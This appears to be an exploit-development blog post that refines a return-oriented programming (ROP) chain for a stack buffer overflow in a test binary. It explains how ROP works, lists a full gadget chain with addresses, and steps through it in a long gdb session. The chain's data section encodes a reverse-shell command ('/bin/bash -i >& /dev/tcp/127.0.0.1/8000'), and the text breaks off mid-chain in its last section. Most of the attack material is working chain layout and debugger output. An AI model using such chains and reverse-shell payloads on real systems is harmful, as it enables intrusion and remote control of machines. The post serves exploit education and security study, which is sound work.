Normal view

There are new articles available, click to refresh the page.

Before yesterdayeXploit

eXploit
Improving The ROP Exploit0xe7
14 January 2015 at 14:55

Improving The ROP Exploit

eXploit

By: 0xe7

14 January 2015 at 14:55

So after the last post I kept thinking of ways that I could improve the exploit so I decided to do it.

If you haven't already read the last post on developing a ROP exploit, you should read that before this because I will not cover anything that I covered there and it is just a continuation of that. You can read it here.

As with any exploit development the main point of interest for improvement is reducing the size of the payload so this is where I will focus.

You can think about obfuscation and such in certain exploitations but when ROP is required obfuscation isn't really an option.

Why/How ROP Works

In the last post I didn't really go into much detail about why or how ROP actually works because the post was already pretty long but I thought I'd go into it a bit here.

In my post titled Basic Binary Auditing, in the section called Stack Frames I explain how function calls and returns work.

The important part of that in terms of ROP is how the function returns. A stack-based buffer overflow exploit is initiated when the vulnerable function returns.

This is because the return address that is stored on the stack is pop'ed off of the stack into eip (the instruction pointer).

This happens because when a function is returning it has no way of knowing where in the application code to continue executing.

Because of this the address that execution should return to after the function is finished is pushed onto the stack when the function is called so that it can be retrieved when its finished.

If you find a stack-based buffer overflow and you are able to send enough data to overwrite this address you can change the flow of execution and point eip wherever you want.

With ROP, understanding this concept is paramount to success. What you are doing is creating your own stack (the same as with return to libc).

The only difference between ROP and return to libc is that instead of "calling" actual library functions you are "calling" snipets of code that resemble the end of a function (a few instructions and then a return), which are called gadgets.

By inserting a bunch of gadgets 1 after another on the stack (chaining) you are controlling the execution flow of the application and with enough gadgets you can build a suitibly large application to do whatever you want.

If you understand this it becomes obvious that esp (the stack pointer) has now become your new eip.

By changing the value of esp you can actually create a new stack elsewhere, this becomes useful for various reasons, eg. if you are constraint for space on the stack (as with in kernel mode) you can allocate space on the heap insert your stack there and change esp to point to your new stack.

I will use this method in this exploit for making ROP function calls and explain how you can use this to make ROP conditional statements.

Moving The Data Section

Back to our exploit.

If you remember we put the data section of our payload at the end but we have 532 A's that we are sending in order to overflow the buffer.

The best way to reduce the size of our exploit to to make as much use of this section at the start as possible.

So we will now move the data section to the start.

I mentioned in the last post that using ////bin/bash instead of /bin/bash wasn't technically needed and was a bit of a waste of space but as we are moving this section to the padding section, which always has to be a fixed 532 bytes, we can leave it as is for now.

If we actually use the whole 532 bytes of this section I will make some changes here to reduce its size but as it is it makes calculations slightly easier.

A ROP Function

IMO, the most exciting part of this new exploit will be the implementation of a "function call".

In the last exploit we were using the same series of gadgets throughout the exploit to calculate addresses.

In a normal application we'd use a function for this, so I thought why shouldn't we here, looking through the avaliable gadgets I created this to do our address calculations:

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

Here the "return address" (the value on the stack that we need to put back into esp at the end) starts off in the eax register.

The function takes 2 "arguments", ecx, which should contain the starting address of the function, and ebx, which should contain the value 0xaaaaaaaa - [distance from the start of the function to the value we want the address of].

As the values we need to calculate are in the data section we want to stick this function below the data section (it could go before but we've have to change the last sub instruction to an add instruction).

The return value of this function is stored in edi when this function is finished.

Based on the gadgets we have avaliable there are 2 different ways, that I have found, we can set up the "call" for this function, the first is this:

1
2
3

0x0808385d : mov eax, ecx ; pop ebx ; pop ebp ; ret
[0xaaaaaaaa - distance from ecx to relevant value]
0xeeeeeeee : junk values to pop

And the second:

1
2
3

0x080a66af : xor eax, eax ; pop ebx ; ret
[0xaaaaaaaa - distance from ecx to relevant value]
0x0807629e : add eax, ecx ; ret

Both of these achieve the same outcome and certainly for our purpose there isn't any difference between the 2.

After 1 of these series of instructions we have the address of the function in eax, so we can call the function with the following gadget:

1	`0x0807b086 : xchg eax, esp ; ret`

This will put the return address into eax and begin execution at the start of our function.

Once our function returns the return value will be in edi, in our old exploit this value was always put into eax or edx.

We can get this value into eax using this gadget:

1	`0x080a3f72 : xchg eax, edi ; ret`

And if we want the return value into edx we can use this gadget:

1	`0x0809cd4b : mov edx, edi ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret`

With this gadget we can put a value straight into ebx setting up ebx for the next function call.

All addresses will now be calculated relative to ecx which should contain the address of the start of the function, therefore this should now be the first problem we approach and the final address of ecx should be set after we've finished with the function.

Testing The Exploit

We want to try to minimize the number of junk values as much as possible too so this should be kept in mind while putting the gadgets together.

At this point you should have notes similar to the following:

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

#################### Function ######################

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

################### Padding A's ####################

A * (532 - len(payload))

################### Application ####################

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x08057b7e : pop ebx ; ret
0xaaaaa8e6 : 0xaaaaaaaa - 452 (distance to 0xffffffff value in the
       : data just before the function
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax now contains the distance from edx to 
---------------------------- 0xffffffff at the end of the data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xaaaaaa96
0xeeeeeeee : junk values to pop
---------------------------- eax now contains the address of 0xffffffff
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret
---------------------------- write nulls over 0xffffffff
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
---------------------------- ecx now contains the starting address
---------------------------- of the function
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret
0x0809cd4b : mov edx, edi ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0xaaaaaa66 : 0xaaaaaaaa - distance to -c 0xffffffff (68)
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------- calculate address of long arg 0xffffffff
---------------------------- and write nulls there

Here I'm using the function to calculate the address of the first set of 0xffffffff (to terminate the long argument string) and writing nulls there.

The actual exploit is a very simple python script, as you should know from the first post, so I will only post the full script at the end when we have developed the final exploit.

You can break at the ret of the checkpass function and step through each instruction, here I will break at the function call and ensure that is working as expected:

appuser@dev:~$ gdb -q ./app-net
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/10xw $esp
>x/i $eip
>end
(gdb) display/x $eax
(gdb) display/x $ebx
(gdb) display/x $ecx
(gdb) display/x $edx
(gdb) display/x $edi
(gdb) display/x $esp
(gdb) break *0x0807629e
Breakpoint 1 at 0x807629e
(gdb) run
Starting program: /home/appuser/app-net 
0xbfffe7c8: 0x0807b086  0x0809cd4b  0xaaaaaa66  0xeeeeeeee
0xbfffe7d8: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x08083f21
0xbfffe7e8: 0x08099c00  0x0807629e
=> 0x807629e <compute_offset+46>:   add    eax,ecx

Breakpoint 1, 0x0807629e in compute_offset ()
6: /x $esp = 0xbfffe7c8
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0x0
(gdb) x/10xw 0xbfffe580
0xbfffe580: 0x080a3f72  0x080a8576  0xaaaaaaaa  0x080748fc
0xbfffe590: 0xeeeeeeee  0xeeeeeeee  0x080535be  0xeeeeeeee
0xbfffe5a0: 0xeeeeeeee  0x08099c0f
(gdb) x/xw 0xbfffe580 - 4
0xbfffe57c: 0x00000000
(gdb) x/xw 0xbfffe580 - 8
0xbfffe578: 0xdddddddd
(gdb) x/xw 0xbfffe580 - 12
0xbfffe574: 0xcccccccc
(gdb) stepi
0xbfffe7c8: 0x0807b086  0x0809cd4b  0xaaaaaa66  0xeeeeeeee
0xbfffe7d8: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x08083f21
0xbfffe7e8: 0x08099c00  0x0807629e
=> 0x80762a0 <compute_offset+48>:   ret    
0x080762a0 in compute_offset ()
6: /x $esp = 0xbfffe7c8
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xbfffe580
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe580: 0x080a3f72  0x080a8576  0xaaaaaaaa  0x080748fc
0xbfffe590: 0xeeeeeeee  0xeeeeeeee  0x080535be  0xeeeeeeee
0xbfffe5a0: 0xeeeeeeee  0x08099c0f
=> 0x807b087 <intel_check_word+391>:    ret    
0x0807b087 in intel_check_word ()
6: /x $esp = 0xbfffe580
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xbfffe7cc
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe584: 0x080a8576  0xaaaaaaaa  0x080748fc  0xeeeeeeee
0xbfffe594: 0xeeeeeeee  0x080535be  0xeeeeeeee  0xeeeeeeee
0xbfffe5a4: 0x08099c0f  0x0807629e
=> 0x80a3f73 <____strtold_l_internal+2499>: ret    
0x080a3f73 in ____strtold_l_internal ()
6: /x $esp = 0xbfffe584
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xeeeeeeee
(gdb) stepi
0xbfffe588: 0xaaaaaaaa  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe598: 0x080535be  0xeeeeeeee  0xeeeeeeee  0x08099c0f
0xbfffe5a8: 0x0807629e  0x080748fc
=> 0x80a8576 <_Unwind_GetDataRelBase+6>:    pop    eax
0x080a8576 in _Unwind_GetDataRelBase ()
6: /x $esp = 0xbfffe588
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xeeeeeeee
(gdb) stepi
0xbfffe58c: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080535be
0xbfffe59c: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x0807629e
0xbfffe5ac: 0x080748fc  0xeeeeeeee
=> 0x80a8577 <_Unwind_GetDataRelBase+7>:    ret    
0x080a8577 in _Unwind_GetDataRelBase ()
6: /x $esp = 0xbfffe58c
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xaaaaaaaa
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe590: 0xeeeeeeee  0xeeeeeeee  0x080535be  0xeeeeeeee
0xbfffe5a0: 0xeeeeeeee  0x08099c0f  0x0807629e  0x080748fc
0xbfffe5b0: 0xeeeeeeee  0xeeeeeeee
=> 0x80748fe <strnlen+126>: pop    ebx
0x080748fe in strnlen ()
6: /x $esp = 0xbfffe590
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0x14
(gdb) stepi
0xbfffe594: 0xeeeeeeee  0x080535be  0xeeeeeeee  0xeeeeeeee
0xbfffe5a4: 0x08099c0f  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe5b4: 0xeeeeeeee  0x080c0f18
=> 0x80748ff <strnlen+127>: pop    ebp
0x080748ff in strnlen ()
6: /x $esp = 0xbfffe594
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0x14
(gdb) stepi
0xbfffe598: 0x080535be  0xeeeeeeee  0xeeeeeeee  0x08099c0f
0xbfffe5a8: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe5b8: 0x080c0f18  0x41414141
=> 0x8074900 <strnlen+128>: ret    
0x08074900 in strnlen ()
6: /x $esp = 0xbfffe598
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0x14
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe598: 0x00000014  0xeeeeeeee  0xeeeeeeee  0x08099c0f
0xbfffe5a8: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe5b8: 0x080c0f18  0x41414141
=> 0x80535bf <malloc_info+239>: pop    ebx
0x080535bf in malloc_info ()
6: /x $esp = 0xbfffe598
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0x14
(gdb) stepi
0xbfffe59c: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x0807629e
0xbfffe5ac: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080c0f18
0xbfffe5bc: 0x41414141  0x41414141
=> 0x80535c0 <malloc_info+240>: pop    esi
0x080535c0 in malloc_info ()
6: /x $esp = 0xbfffe59c
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x14
(gdb) stepi
0xbfffe5a0: 0xeeeeeeee  0x08099c0f  0x0807629e  0x080748fc
0xbfffe5b0: 0xeeeeeeee  0xeeeeeeee  0x080c0f18  0x41414141
0xbfffe5c0: 0x41414141  0x41414141
=> 0x80535c1 <malloc_info+241>: pop    ebp
0x080535c1 in malloc_info ()
6: /x $esp = 0xbfffe5a0
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x14
(gdb) stepi
0xbfffe5a4: 0x08099c0f  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe5b4: 0xeeeeeeee  0x080c0f18  0x41414141  0x41414141
0xbfffe5c4: 0x41414141  0x41414141
=> 0x80535c2 <malloc_info+242>: ret    
0x080535c2 in malloc_info ()
6: /x $esp = 0xbfffe5a4
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x14
(gdb) stepi
0xbfffe5a8: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe5b8: 0x080c0f18  0x41414141  0x41414141  0x41414141
0xbfffe5c8: 0x41414141  0x41414141
=> 0x8099c0f <strpbrk+175>: xor    eax,eax
0x08099c0f in strpbrk ()
6: /x $esp = 0xbfffe5a8
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x14
(gdb) stepi
0xbfffe5a8: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe5b8: 0x080c0f18  0x41414141  0x41414141  0x41414141
0xbfffe5c8: 0x41414141  0x41414141
=> 0x8099c11 <strpbrk+177>: ret    
0x08099c11 in strpbrk ()
6: /x $esp = 0xbfffe5a8
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x0
(gdb) stepi
0xbfffe5ac: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080c0f18
0xbfffe5bc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5cc: 0x41414141  0x41414141
=> 0x807629e <compute_offset+46>:   add    eax,ecx

Breakpoint 1, 0x0807629e in compute_offset ()
6: /x $esp = 0xbfffe5ac
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x0
(gdb) stepi
0xbfffe5ac: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080c0f18
0xbfffe5bc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5cc: 0x41414141  0x41414141
=> 0x80762a0 <compute_offset+48>:   ret    
0x080762a0 in compute_offset ()
6: /x $esp = 0xbfffe5ac
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0xbfffe580
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe5b0: 0xeeeeeeee  0xeeeeeeee  0x080c0f18  0x41414141
0xbfffe5c0: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5d0: 0x41414141  0x41414141
=> 0x80748fe <strnlen+126>: pop    ebx
0x080748fe in strnlen ()
6: /x $esp = 0xbfffe5b0
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0xbfffe56c
(gdb) x/xw 0xbfffe56c
0xbfffe56c: 0xffffffff
(gdb) x/xw 0xbfffe56c + 4
0xbfffe570: 0xbbbbbbbb
(gdb) stepi
0xbfffe5b4: 0xeeeeeeee  0x080c0f18  0x41414141  0x41414141
0xbfffe5c4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5d4: 0x41414141  0x41414141
=> 0x80748ff <strnlen+127>: pop    ebp
0x080748ff in strnlen ()
6: /x $esp = 0xbfffe5b4
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe56c
(gdb) stepi
0xbfffe5b8: 0x080c0f18  0x41414141  0x41414141  0x41414141
0xbfffe5c8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5d8: 0x41414141  0x41414141
=> 0x8074900 <strnlen+128>: ret    
0x08074900 in strnlen ()
6: /x $esp = 0xbfffe5b8
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe56c
(gdb) stepi
0xbfffe5bc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5cc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5dc: 0x41414141  0x41414141
=> 0x80c0f18 <__tens+2904>: xchg   edi,eax
0x080c0f18 in __tens ()
6: /x $esp = 0xbfffe5bc
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe56c
(gdb) stepi
0xbfffe5bc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5cc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5dc: 0x41414141  0x41414141
=> 0x80c0f19 <__tens+2905>: xchg   esp,eax
0x080c0f19 in __tens ()
6: /x $esp = 0xbfffe5bc
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe7cc
(gdb) stepi
0xbfffe7cc: 0x0809cd4b  0xaaaaaa66  0xeeeeeeee  0xeeeeeeee
0xbfffe7dc: 0xeeeeeeee  0x08099c0f  0x08083f21  0x08099c00
0xbfffe7ec: 0x0807629e  0x080748fc
=> 0x80c0f1a <__tens+2906>: ret    
0x080c0f1a in __tens ()
6: /x $esp = 0xbfffe7cc
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe5bc
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe7d0: 0xaaaaaa66  0xeeeeeeee  0xeeeeeeee  0xeeeeeeee
0xbfffe7e0: 0x08099c0f  0x08083f21  0x08099c00  0x0807629e
0xbfffe7f0: 0x080748fc  0xeeeeeeee
=> 0x809cd4d <____strtoull_l_internal+525>: pop    ebx
0x0809cd4d in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7d0
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7d4: 0xeeeeeeee  0xeeeeeeee  0xeeeeeeee  0x08099c0f
0xbfffe7e4: 0x08083f21  0x08099c00  0x0807629e  0x080748fc
0xbfffe7f4: 0xeeeeeeee  0xeeeeeeee
=> 0x809cd4e <____strtoull_l_internal+526>: pop    esi
0x0809cd4e in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7d4
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7d8: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x08083f21
0xbfffe7e8: 0x08099c00  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe7f8: 0xeeeeeeee  0x080c0f18
=> 0x809cd4f <____strtoull_l_internal+527>: pop    edi
0x0809cd4f in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7d8
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7dc: 0xeeeeeeee  0x08099c0f  0x08083f21  0x08099c00
0xbfffe7ec: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe7fc: 0x080c0f18  0x41414141
=> 0x809cd50 <____strtoull_l_internal+528>: pop    ebp
0x0809cd50 in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7dc
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7e0: 0x08099c0f  0x08083f21  0x08099c00  0x0807629e
0xbfffe7f0: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080c0f18
0xbfffe800: 0x41414141  0x41414141
=> 0x809cd51 <____strtoull_l_internal+529>: ret    
0x0809cd51 in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7e0
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7e4: 0x08083f21  0x08099c00  0x0807629e  0x080748fc
0xbfffe7f4: 0xeeeeeeee  0xeeeeeeee  0x080c0f18  0x41414141
0xbfffe804: 0x41414141  0x41414141
=> 0x8099c0f <strpbrk+175>: xor    eax,eax
0x08099c0f in strpbrk ()
6: /x $esp = 0xbfffe7e4
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7e4: 0x08083f21  0x08099c00  0x0807629e  0x080748fc
0xbfffe7f4: 0xeeeeeeee  0xeeeeeeee  0x080c0f18  0x41414141
0xbfffe804: 0x41414141  0x41414141
=> 0x8099c11 <strpbrk+177>: ret    
0x08099c11 in strpbrk ()
6: /x $esp = 0xbfffe7e4
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0x0
(gdb) x/xw 0xbfffe56c
0xbfffe56c: 0xffffffff
(gdb) stepi
0xbfffe7e8: 0x08099c00  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe7f8: 0xeeeeeeee  0x080c0f18  0x41414141  0x41414141
0xbfffe808: 0x41414141  0x41414141
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax
0x08083f21 in _dl_get_tls_static_info ()
6: /x $esp = 0xbfffe7e8
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0x0
(gdb) stepi
0xbfffe7e8: 0x08099c00  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe7f8: 0xeeeeeeee  0x080c0f18  0x41414141  0x41414141
0xbfffe808: 0x41414141  0x41414141
=> 0x8083f23 <_dl_get_tls_static_info+19>:  ret    
0x08083f23 in _dl_get_tls_static_info ()
6: /x $esp = 0xbfffe7e8
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0x0
(gdb) x/xw 0xbfffe56c
0xbfffe56c: 0x00000000

So our function seemed to have worked perfectly! :-)

Control Statements

I thought of a few different ways that control statements might be possible but was unable to find any relevant gadgets that was capable of doing it.

Because of this I haven't actually implemented any control statements in the exploit but I will describe a few gadgets that might make it possible.

The main reason I wanted a control statement in the exploit was because quite often I need to move the return value of the function into edx but the gadget to do this requires 4 double words on the stack.

As edx wasn't being used throughout the function I would have liked to find a gadget like this:

1	`test edx, edx ; je esi ; ret`

If we made sure edx = 0 and esi contained the address of the following gadget:

1	`0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret`

Then we could move the return value of the function into edx within the function, shrinking the size of the payload a little more.

This allows us the run 1 gadget different depending on the value of 1 register (in this case edx).

If we could find the inverse of this contional jump, like this:

1	`test edx, edx ; jne edx ; ret`

In this case we still have esi spare and we just have to make sure edx is zero if we don't want to take the jump.

Of course the gadget pointed to by esi/edx (or any unused register which a gadget could jump to) could be something similar to the following:

1	`xchg [reg], esp ; ret`

Now, instead of just running 1 gadget, we are able to change the control flow of the application in a much bigger way.

Of course these examples are just dealing with testing if a value is zero or not but there is no reason why we could check for a number of different values with a gadget like the following:

1	`test edx, esi ; je eax ; ret`

We could place a number of these to test for a number of specific values or even a range using 2 gadgets similar to the following:

1 2	`test edx, esi ; jg eax ; ret` test edx, ebx ; jl eax ; ret

Obviously there are so many different combinations that could lead to different branches being taken depending on certain values, these values don't necessarily need to be values set by the programmer either.

Consider the following:

1	`test dword ptr [edx], esi ; je eax ; ret`

Or the following sequence:

1 2	`mov edx, dword ptr [edx] ; ret` test edx, esi ; je eax ; ret

Now we can test values in memory against specific values and make decisions based on that.

Another option would be with conditional move's, like this:

1 2	`test edx, edx ; ret` cmove esp, eax ; ret

The goal here isn't to give you all of the possibilities that might arise, I don't think that would even be possible (there are so many possibiities), but to show that using a bit of creativity and having the right gadgets you can create reasonably complex applications using ROP.

Obviously you are limited by the gadgets that are avaliable to you though.

A Second Function

I decided to add a second function which would take 3 arguments, the same 2 as the first function but with the extra value inside edx, this would be a value to write to the address that is being calculated.

The resulting function was:

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
